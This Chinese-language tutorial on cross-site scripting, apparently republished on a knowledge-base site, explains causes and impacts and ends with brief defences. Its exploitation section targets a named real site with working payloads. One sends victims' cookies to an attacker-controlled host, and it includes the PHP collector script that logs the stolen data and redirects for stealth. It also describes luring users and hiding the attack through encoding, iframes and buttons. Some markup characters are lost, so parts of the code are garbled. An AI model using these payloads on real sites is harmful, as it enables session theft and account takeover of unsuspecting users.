主頁(yè) > 知識(shí)庫(kù) > 跨站腳本執(zhí)行漏洞詳解與防護(hù)

跨站腳本執(zhí)行漏洞詳解與防護(hù)
熱門(mén)標(biāo)簽:vue 地圖標(biāo)注拖拽 電話機(jī)器人銷售公司嗎 保定電銷機(jī)器人軟件 自動(dòng)外呼系統(tǒng)怎么防止封卡 土地證宗地圖標(biāo)注符號(hào) 客服外呼系統(tǒng)呼叫中心 成都銷售外呼系統(tǒng)公司 電話機(jī)器人案例 鎮(zhèn)江云外呼系統(tǒng)怎么樣
本文主要介紹跨站腳本執(zhí)行漏洞的成因,形式,危害,利用方式,隱藏技巧,解決方法和常見(jiàn)問(wèn)題 (FAQ),由于目前介紹跨站腳本執(zhí)行漏洞的資料還不是很多,而且一般也不是很詳細(xì),所以希望本文能夠 比較詳細(xì)的介紹該漏洞。由于時(shí)間倉(cāng)促,水平有限,本文可能有不少錯(cuò)誤,希望大家不吝賜教。 

聲明,請(qǐng)不要利用本文介紹的任何內(nèi)容,代碼或方法進(jìn)行破壞,否則一切后果自負(fù)! 

【漏洞成因】 
原因很簡(jiǎn)單,就是因?yàn)镃GI程序沒(méi)有對(duì)用戶提交的變量中的HTML代碼進(jìn)行過(guò)濾或轉(zhuǎn)換。 

【漏洞形式】 
這里所說(shuō)的形式,實(shí)際上是指CGI輸入的形式,主要分為兩種: 
1.顯示輸入 
2.隱式輸入 
其中顯示輸入明確要求用戶輸入數(shù)據(jù),而隱式輸入則本來(lái)并不要求用戶輸入數(shù)據(jù),但是用戶卻可以通 過(guò)輸入數(shù)據(jù)來(lái)進(jìn)行干涉。 
顯示輸入又可以分為兩種: 
1. 輸入完成立刻輸出結(jié)果 
2. 輸入完成先存儲(chǔ)在文本文件或數(shù)據(jù)庫(kù)中,然后再輸出結(jié)果 
注意:后者可能會(huì)讓你的網(wǎng)站面目全非?。海?nbsp;
而隱式輸入除了一些正常的情況外,還可以利用服務(wù)器或CGI程序處理錯(cuò)誤信息的方式來(lái)實(shí)施。 

【漏洞危害】 
大家最關(guān)心的大概就要算這個(gè)問(wèn)題了,下面列舉的可能并不全面,也不系統(tǒng),但是我想應(yīng)該是比較典 型的吧。 
1. 獲取其他用戶Cookie中的敏感數(shù)據(jù) 
2. 屏蔽頁(yè)面特定信息 
3. 偽造頁(yè)面信息 
4. 拒絕服務(wù)攻擊 
5. 突破外網(wǎng)內(nèi)網(wǎng)不同安全設(shè)置 
6. 與其它漏洞結(jié)合,修改系統(tǒng)設(shè)置,查看系統(tǒng)文件,執(zhí)行系統(tǒng)命令等 
7. 其它 
一般來(lái)說(shuō),上面的危害還經(jīng)常伴隨著頁(yè)面變形的情況。而所謂跨站腳本執(zhí)行漏洞,也就是通過(guò)別人的 網(wǎng)站達(dá)到攻擊的效果,也就是說(shuō),這種攻擊能在一定程度上隱藏身份。 

【利用方式】 
下面我們將通過(guò)具體例子來(lái)演示上面的各種危害,這樣應(yīng)該更能說(shuō)明問(wèn)題,而且更易于理解。為了條 理更清晰一些,我們將針對(duì)每種危害做一個(gè)實(shí)驗(yàn)。 
為了做好這些實(shí)驗(yàn),我們需要一個(gè)抓包軟件,我使用的是Iris,當(dāng)然你可以選擇其它的軟件,比如 NetXray什么的。至于具體的使用方法,請(qǐng)參考相關(guān)幫助或手冊(cè)。 
另外,需要明白的一點(diǎn)就是:只要服務(wù)器返回用戶提交的信息,就可能存在跨站腳本執(zhí)行漏洞。 
好的,一切就緒,我們開(kāi)始做實(shí)驗(yàn)!:) 

實(shí)驗(yàn)一:獲取其他用戶Cookie中的敏感信息 
我們以國(guó)內(nèi)著名的同學(xué)錄站點(diǎn)5460.net為例來(lái)說(shuō)明一下,請(qǐng)按照下面的步驟進(jìn)行: 
1. 進(jìn)入首頁(yè)http://www.5460.net/ 
2. 輸入用戶名“h1>”,提交,發(fā)現(xiàn)服務(wù)器返回信息中包含了用戶提交的“h1>”。 
3. 分析抓包數(shù)據(jù),得到實(shí)際請(qǐng)求: 
http://www.5460.net/txl/login/login.pl?username=h1>passwd=ok.x=28ok.y=6 
4. 構(gòu)造一個(gè)提交,目標(biāo)是能夠顯示用戶Cookie信息: 
http://www.5460.net/txl/login/login.pl?username=script>alert(document.cookie)/ script>passwd=ok.x=28ok.y=6 
5. 如果上面的請(qǐng)求獲得預(yù)期的效果,那么我們就可以嘗試下面的請(qǐng)求: 
http://www.5460.net/txl/login/login.pl?username=script>window.open("http://www.notfound.org/ info.php?"%2Bdocument.cookie)/script>passwd=ok.x=28ok.y=6 
其中http://www.notfound.org/info.php是你能夠控制的某臺(tái)主機(jī)上的一個(gè)腳本,功能是獲取查詢字符串的信 息,內(nèi)容如下: 
?php 
$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("info.txt","a"); 
fwrite($fp,$info."/n"); 
fclose($fp); 

header("Location: http://www.5460.net"); 
注:“%2B”為“+”的URL編碼,并且這里只能用“%2B”,因?yàn)椤?”將被作為空格處理。后面的header語(yǔ) 句則純粹是為了增加隱蔽性。 
6. 如果上面的URL能夠正確運(yùn)行的話,下一步就是誘使登陸5460.net的用戶訪問(wèn)該URL,而我們就可以 獲取該用戶Cookie中的敏感信息。 
7. 后面要做什么就由你決定吧! 

實(shí)驗(yàn)二:屏蔽頁(yè)面特定信息 
我們?nèi)匀灰?460.net作為例子,下面是一個(gè)有問(wèn)題的CGI程序: 
http://www.5460.net/txl/liuyan/liuyanSql.pl 
該CGI程序接受用戶提供的三個(gè)變量,即nId,csId和cName,但是沒(méi)有對(duì)用戶提交的cName變量進(jìn)行任何檢 查,而且該CGI程序把cName的值作為輸出頁(yè)面的一部分,5460.net的用戶應(yīng)該都比較清楚留言右下角有你 的名字,對(duì)吧? 
既然有了上面的種種條件,我們可以不妨作出下面的結(jié)論: 
某個(gè)用戶可以“屏蔽”其兩次留言之間的所有留言! 
當(dāng)然,我們說(shuō)的“屏蔽”不是“刪除”,用戶的留言還是存在的,只不過(guò)由于HTML的特性,我們無(wú)法從 頁(yè)面看到,當(dāng)然如果你喜歡查看源代碼的話就沒(méi)有什么用處了,但是出了我們這些研究CGI安全的人來(lái) 說(shuō),有多少人有事沒(méi)事都看HTML源代碼? 
由于種種原因,我在這里就不公布具體的細(xì)節(jié)了,大家知道原理就好了。 
注:仔細(xì)想想,我們不僅能屏蔽留言,還能匿名留言,Right? 

實(shí)驗(yàn)三:偽造頁(yè)面信息 
如果你理解了上面那個(gè)實(shí)驗(yàn),這個(gè)實(shí)驗(yàn)就沒(méi)有必要做了,基本原理相同,只是實(shí)現(xiàn)起來(lái)稍微麻煩一點(diǎn)而 已。 

實(shí)驗(yàn)四:拒絕服務(wù)攻擊 
現(xiàn)在應(yīng)該知道,我們?cè)谀撤N程度上可以控制存在跨站腳本執(zhí)行漏洞的服務(wù)器的行為,既然這樣,我們 就可以控制服務(wù)器進(jìn)行某種消耗資源的動(dòng)作。比如說(shuō)運(yùn)行包含死循環(huán)或打開(kāi)無(wú)窮多個(gè)窗口的JavaScript腳本 等等。這樣訪問(wèn)該URL的用戶系統(tǒng)就可能因此速度變慢甚至崩潰。同樣,我們也可能在其中嵌入一些腳 本,讓該服務(wù)器請(qǐng)求其它服務(wù)器上的資源,如果訪問(wèn)的資源比較消耗資源,并且訪問(wèn)人數(shù)比較多的話,那 么被訪問(wèn)的服務(wù)器也可能被拒絕服務(wù),而它則認(rèn)為該拒絕服務(wù)攻擊是由訪問(wèn)它的服務(wù)器發(fā)起的,這樣就可 以隱藏身份。 

實(shí)驗(yàn)五:突破外網(wǎng)內(nèi)網(wǎng)不同安全設(shè)置 
這個(gè)應(yīng)該很好理解吧,一般來(lái)說(shuō)我們的瀏覽器對(duì)不同的區(qū)域設(shè)置了不同的安全級(jí)別。舉例來(lái)說(shuō),對(duì)于 Internet區(qū)域,可能你不允許JavaScript執(zhí)行,而在Intranet區(qū)域,你就允許JavaScript執(zhí)行。一般來(lái)說(shuō),前者的 安全級(jí)別都要高于后者。這樣,一般情況下別人無(wú)法通過(guò)執(zhí)行惡意JavaScript腳本對(duì)你進(jìn)行攻擊,但是如果 與你處于相同內(nèi)網(wǎng)的服務(wù)器存在跨站腳本執(zhí)行漏洞,那么攻擊者就有機(jī)可乘了,因?yàn)樵摲?wù)器位于Intranet 區(qū)域。 

實(shí)驗(yàn)六:與其它漏洞結(jié)合,修改系統(tǒng)設(shè)置,查看系統(tǒng)文件,執(zhí)行系統(tǒng)命令等 
由于與瀏覽器相關(guān)的漏洞太多了,所以可與跨站腳本執(zhí)行漏洞一起結(jié)合的漏洞也就顯得不少。我想這 些問(wèn)題大家都應(yīng)該很清楚吧,前些時(shí)間的修改IE標(biāo)題漏洞,錯(cuò)誤MIME類型執(zhí)行命令漏洞,還有多種多樣 的蠕蟲(chóng),都是很好的例子。 
更多的例子請(qǐng)參考下列鏈接: 
Internet Explorer Pop-Up OBJECT Tag Bug 
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html 
Internet Explorer Javascript Modeless Popup Local Denial of Service Vulnerability 
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html 
MSIE6 can read local files 
http://www.xs4all.nl/~jkuperus/bug.htm 
MSIE may download and run progams automatically 
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html 
File extensions spoofable in MSIE download dialog 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html 
the other IE cookie stealing bug (MS01-055) 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html 
Microsoft Security Bulletin MS01-055 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html 
Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing 
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html 
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment 
http://www.kriptopolis.com/cua/eml.html 

跨站腳本執(zhí)行漏洞在這里的角色就是隱藏真正攻擊者的身份。 

實(shí)驗(yàn)七:其它 
其實(shí)這類問(wèn)題和跨站腳本執(zhí)行漏洞沒(méi)有多大關(guān)系,但是在這里提一下還是很有必要的。問(wèn)題的實(shí)質(zhì)還 是CGI程序沒(méi)有過(guò)濾用戶提交的數(shù)據(jù),然后進(jìn)行了輸出處理。舉個(gè)例子來(lái)說(shuō),支持SSI的服務(wù)器上的CGI程 序輸出了用戶提交的數(shù)據(jù),無(wú)論該數(shù)據(jù)是采取何種方式輸入,都可能導(dǎo)致SSI指令的執(zhí)行。當(dāng)然,這是在服 務(wù)端,而不是客戶端執(zhí)行。其實(shí)像ASP,PHP和Perl等CGI語(yǔ)言都可能導(dǎo)致這種問(wèn)題。 

【隱藏技巧】 
出于時(shí)間的考慮,我在這里將主要講一下理論了,相信不是很難懂,如果實(shí)在有問(wèn)題,那么去找本書(shū) 看吧。 
1. URL編碼 
比較一下: 
http://www.5460.net/txl/login/login.pl?username=h1>passwd=ok.x=28ok.y=6 
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3Epasswd=ok.x=28ok.y=6 
你覺(jué)得哪個(gè)更有隱蔽性?! 

2. 隱藏在其它對(duì)象之下 
與直接給別人一個(gè)鏈接相比,你是否決定把該鏈接隱藏在按鈕以下更好些呢? 

3. 嵌入頁(yè)面中 
讓別人訪問(wèn)一個(gè)地址(注意這里的地址不同于上面提到的URL),是不是又要比讓別人按一個(gè)按鈕容易得 多,借助于Iframe,你可以把這種攻擊變得更隱蔽。 

4. 合理利用事件 
合理使用事件,在某些情況上可以繞過(guò)CGI程序?qū)斎氲南拗?,比如說(shuō)前些日子的SecurityFocus的跨站腳本 執(zhí)行漏洞。 

【注意事項(xiàng)】 
一般情況下直接進(jìn)行類似script>alert(document.cookie)/script>之類的攻擊沒(méi)有什么問(wèn)題,但是有時(shí) CGI程序?qū)τ脩舻妮斎脒M(jìn)行了一些處理,比如說(shuō)包含在''或””之內(nèi),這時(shí)我們就需要使用一些小技巧 來(lái)繞過(guò)這些限制。 
如果你對(duì)HTML語(yǔ)言比較熟悉的話,繞過(guò)這些限制應(yīng)該不成問(wèn)題。 

【解決方法】 
要避免受到跨站腳本執(zhí)行漏洞的攻擊,需要程序員和用戶兩方面共同努力: 
程序員: 
1. 過(guò)濾或轉(zhuǎn)換用戶提交數(shù)據(jù)中的HTML代碼 
2. 限制用戶提交數(shù)據(jù)的長(zhǎng)度 

用戶: 
1. 不要輕易訪問(wèn)別人給你的鏈接 
2. 禁止瀏覽器運(yùn)行JavaScript和ActiveX代碼 

附:常見(jiàn)瀏覽器修改設(shè)置的位置為: 
Internet Explorer: 
工具->Internet選項(xiàng)->安全->Internet->自定義級(jí)別 
工具->Internet選項(xiàng)->安全->Intranet->自定義級(jí)別 
Opera: 
文件->快速參數(shù)->允許使用Java 
文件->快速參數(shù)->允許使用插件 
文件->快速參數(shù)->允許使用JavaScript 

【常見(jiàn)問(wèn)題】 
Q:跨站腳本執(zhí)行漏洞在哪里存在? 
A:只要是CGI程序,只要允許用戶輸入,就可能存在跨站腳本執(zhí)行漏洞。 

Q:跨站腳本執(zhí)行漏洞是不是只能偷別人的Cookie? 
A:當(dāng)然不是!HTML代碼能做的,跨站腳本執(zhí)行漏洞基本都能做。 

標(biāo)簽:臺(tái)灣 成都 天津 公主嶺 內(nèi)江 懷化 麗江 重慶

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《跨站腳本執(zhí)行漏洞詳解與防護(hù)》,本文關(guān)鍵詞  跨站,腳本,執(zhí)行,漏洞,詳解,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《跨站腳本執(zhí)行漏洞詳解與防護(hù)》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于跨站腳本執(zhí)行漏洞詳解與防護(hù)的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章